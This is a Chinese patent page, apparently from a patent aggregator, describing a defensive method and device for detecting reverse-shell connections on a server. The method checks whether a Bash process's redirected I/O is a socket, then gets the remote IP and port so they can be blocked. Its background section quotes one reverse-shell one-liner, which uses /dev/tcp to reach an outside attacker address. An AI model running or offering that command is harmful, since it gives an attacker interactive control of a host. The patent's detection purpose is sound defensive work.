反弹shell网络连接的信息查找方法及装置制造方法及图纸

本发明专利技术公开了一种反弹shell网络连接的信息查找方法及装置。其中，反弹shell网络连接的信息查找方法包括：监听Bash进程创建事件；当监听到Bash进程创建时，判断Bash进程对应的重定向文件是否为套接字文件；若是，则确定Bash进程为反弹shell进程，根据套接字文件描述符判断是否存在反弹shell网络连接；若是，则确认服务器存在反弹shell攻击，两者结合提高了反弹shell检测的准确性，获取反弹shell网络连接的IP地址及端口号，通过准确地获取到IP地址及端口号，对IP地址及端口号进行屏蔽，可以提升安全性，可以及时终止攻击者想要通过反弹shell进行权限提取及漏洞执行的行为，避免安全事件的发生。

Information Search Method and Device for Rebound Shell Network Connection

【技术实现步骤摘要】
反弹shell网络连接的信息查找方法及装置
本专利技术涉及计算机
，具体涉及一种反弹shell网络连接的信息查找方法及装置。
技术介绍
现有的网络攻击一般是网站攻击者利用网站存在的漏洞，对网站服务器进行攻击，从而导致安全事件频发，这种攻击不仅对企业形象造成影响还会产生经济损失。其中，通过Webshell入侵网站是攻击者常用的攻击手段。Web攻击者拿到Web服务器的Webshell后需要提权，提权需要一个可交互的运行环境，因此攻击者需要先反弹一个可交互的shell，然后在命令行终端执行相关命令进行权限提取等操作。一旦攻击者成功通过反弹shell的交互环境获取到服务器的最高权限后，可继续利用该交互环境对服务器进行其他的攻击和漏洞利用。如果能及时发现某台服务器存在反弹shell，并采取相关措施关闭检测到的反弹shell连接，可在第一时间终止攻击者对Web服务器的攻击。现有的Webshell检测技术，重点关注如何查杀后门脚本文件即对Webshell脚本文件的查杀。在反弹shell检测方面，现有的专利“201710540141.6一种检测和防范反弹shell的方法和系统”通过捕获执行shell程序的动作，判断shell进程是否带终端属性判断该shell程序是否为反弹shell。如果是反弹shell，则向反弹shell进程发出终止信号，杀死进程，并无法准确地获取到反弹shell网络连接的IP地址及端口号。
技术实现思路
鉴于上述问题，提出了本专利技术以便提供一种克服上述问题或者至少部分地解决上述问题的反弹shell网络连接的信息查找方法及装置。根据本专利技术的一个方面，提供了一种反弹shell网络连接的信息查找方法，包括：监听Bash进程创建事件；当监听到Bash进程创建时，判断Bash进程对应的重定向文件是否为套接字文件；若是，则确定Bash进程为反弹shell进程，根据套接字文件描述符判断是否存在反弹shell网络连接；若是，则获取反弹shell网络连接的IP地址及端口号。根据本专利技术的另一方面，提供了一种反弹shell网络连接的信息查找装置，包括：监听模块，适于监听Bash进程创建事件；第一判断模块，适于当监听到Bash进程创建时，判断Bash进程对应的重定向文件是否为套接字文件；第二判断模块，适于若Bash进程对应的重定向文件为套接字文件，则确定Bash进程为反弹shell进程，根据套接字文件描述符判断是否存在反弹shell网络连接；获取模块，适于若根据套接字文件描述符判断存在反弹shell网络连接，则获取反弹shell网络连接的IP地址及端口号。根据本专利技术的又一方面，提供了一种计算设备，包括：处理器、存储器、通信接口和通信总线，处理器、存储器和通信接口通过通信总线完成相互间的通信；存储器用于存放至少一可执行指令，可执行指令使处理器执行上述反弹shell网络连接的信息查找方法对应的操作。根据本专利技术的再一方面，提供了一种计算机存储介质，存储介质中存储有至少一可执行指令，可执行指令使处理器执行如上述反弹shell网络连接的信息查找方法对应的操作。根据本专利技术提供的方案，监听Bash进程创建事件；当监听到Bash进程创建时，判断Bash进程对应的重定向文件是否为套接字文件；若是，则确定Bash进程为反弹shell进程，根据套接字文件描述符判断是否存在反弹shell网络连接；若是，则获取反弹shell网络连接的IP地址及端口号。基于本专利技术提供的方案，通过判断Bash进程对应的重定向文件是否为套接字文件，若是，则根据该套接字文件描述符确定是否存在反弹shell网络连接，由此确认服务器存在反弹shell攻击，两者结合提高了反弹shell检测的准确性，在确定反弹shell网络连接的情况下，获取反弹shell网络连接的IP地址及端口号，可以对IP地址及端口号进行屏蔽处理，以及时终止攻击者想要通过反弹shell进行权限提取及漏洞执行的行为，避免安全事件的发生。上述说明仅是本专利技术技术方案的概述，为了能够更清楚了解本专利技术的技术手段，而可依照说明书的内容予以实施，并且为了让本专利技术的上述和其它目的、特征和优点能够更明显易懂，以下特举本专利技术的具体实施方式。附图说明通过阅读下文优选实施方式的详细描述，各种其他的优点和益处对于本领域普通技术人员将变得清楚明了。附图仅用于示出优选实施方式的目的，而并不认为是对本专利技术的限制。而且在整个附图中，用相同的参考符号表示相同的部件。在附图中：图1为反弹shell示意图；图2示出了根据本专利技术一个实施例的反弹shell网络连接的信息查找方法的流程示意图；图3示出了根据本专利技术另一个实施例的反弹shell网络连接的信息查找方法的流程示意图；图4示出了根据本专利技术一个实施例的反弹shell网络连接的信息查找装置的结构示意图；图5示出了根据本专利技术一个实施例的计算设备的结构示意图。具体实施方式下面将参照附图更详细地描述本公开的示例性实施例。虽然附图中显示了本公开的示例性实施例，然而应当理解，可以以各种形式实现本公开而不应被这里阐述的实施例所限制。相反，提供这些实施例是为了能够更透彻地理解本公开，并且能够将本公开的范围完整的传达给本领域的技术人员。图1为反弹shell示意图，在图1所示场景中，目标主机为一个内网主机，没有公网IP地址，攻击者无法从外网发起对目标主机的远程连接，为了获得方便直接操作目标主机的交互环境，就需要对目标主机进行提权操作。攻击者使用获取的Webshell执行bash命令：bash-i>&/dev/tcp/119.119.119.119/77770>&1，运行该命令后由目标主机主动发起一个反弹的shell到外网攻击者机器119.119.119.119，获取目标主机的shell终端控制环境。针对这种情况，就需要准确地查找到该反弹shell网络连接的IP地址及端口号，以便阻断反弹shell，防止攻击者对目标主机的攻击。为了能够实现准确地查找到IP地址及端口号，本专利技术专利技术人提出了一种能够及时准确地查找到IP地址及端口号的方法及装置。下面结合具体实施例进行说明。图2示出了根据本专利技术一个实施例的反弹shell网络连接的信息查找方法的流程示意图。如图2所示，该方法包括以下步骤：步骤S200，监听Bash进程创建事件。为了能够及时对反弹shell进行阻断，需要及时发现Bash进程是否创建，具体地，可以采用以下方法确定是否创建了Bash进程：对Bash进程创建事件进行监听，例如，通过循环遍历/proc文件的方式。在本实施例中，监听Bash进程创建事件以及时发现创建的Bash进程，为阻断反弹shell提供了检测基础。步骤S201，当监听到Bash进程创建时，判断Bash进程对应的重定向文件是否为套接字文件，若是，则执行步骤S202。正常情况下，Bash进程会定向到终端设备文件中，例如，/dev/pts/0文件、/dev/pts/1文件。若攻击者通过Bash进程进行反弹shell，通常采用重定向技术，重定向到套接字文件中。为了能够准确地阻断反弹shell，且进一步提升阻断地准确率，避免出现错误阻断的情况，在监听到Bash进程创建后，需要做进一步的判断，具体地，判断Bash进程对应的重定向文本文档来自技高网...

【技术保护点】
1.一种反弹shell网络连接的信息查找方法，包括：监听Bash进程创建事件；当监听到Bash进程创建时，判断Bash进程对应的重定向文件是否为套接字文件；若是，则确定所述Bash进程为反弹shell进程，根据套接字文件描述符判断是否存在反弹shell网络连接；若是，则获取反弹shell网络连接的IP地址及端口号。

【技术特征摘要】
1.一种反弹shell网络连接的信息查找方法，包括：监听Bash进程创建事件；当监听到Bash进程创建时，判断Bash进程对应的重定向文件是否为套接字文件；若是，则确定所述Bash进程为反弹shell进程，根据套接字文件描述符判断是否存在反弹shell网络连接；若是，则获取反弹shell网络连接的IP地址及端口号。2.根据权利要求1所述的方法，其中，所述根据套接字文件描述符判断是否存在反弹shell网络连接进一步包括：获取所述Bash进程对应的重定向文件的套接字文件描述符；判断所有网络连接中是否存在任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符相匹配；若是，则确定该网络连接为反弹shell网络连接。3.根据权利要求1或2所述的方法，其中，所述监听Bash进程创建事件进一步包括：通过内核提供的订阅机制订阅Bash进程的创建通知消息。4.根据权利要求1或2所述的方法，其中，所述判断Bash进程对应的重定向文件是否为套接字文件进一步包括：根据所述Bash进程的进程标识查找Bash进程对应的重定向文件；判断所述Bash进程对应的重定向文件的命名格式是否为预设命名格式；若是，则确定所述Bash进程对应的重定向文件为套接字文件。5.根据权利要求1或2所述的方法，其中，所述Bash进程对应的重定向文件为Bash进程的标准输入输出及标准错误输出对应的重定向文件。6.一种反弹shell网络连接的信息查找装置，包括：监...

【专利技术属性】
技术研发人员：汪德嘉，华保健，柴倩，沈杰，张瑞钦，
申请(专利权)人：江苏通付盾信息安全技术有限公司，
类型：发明
国别省市：江苏,32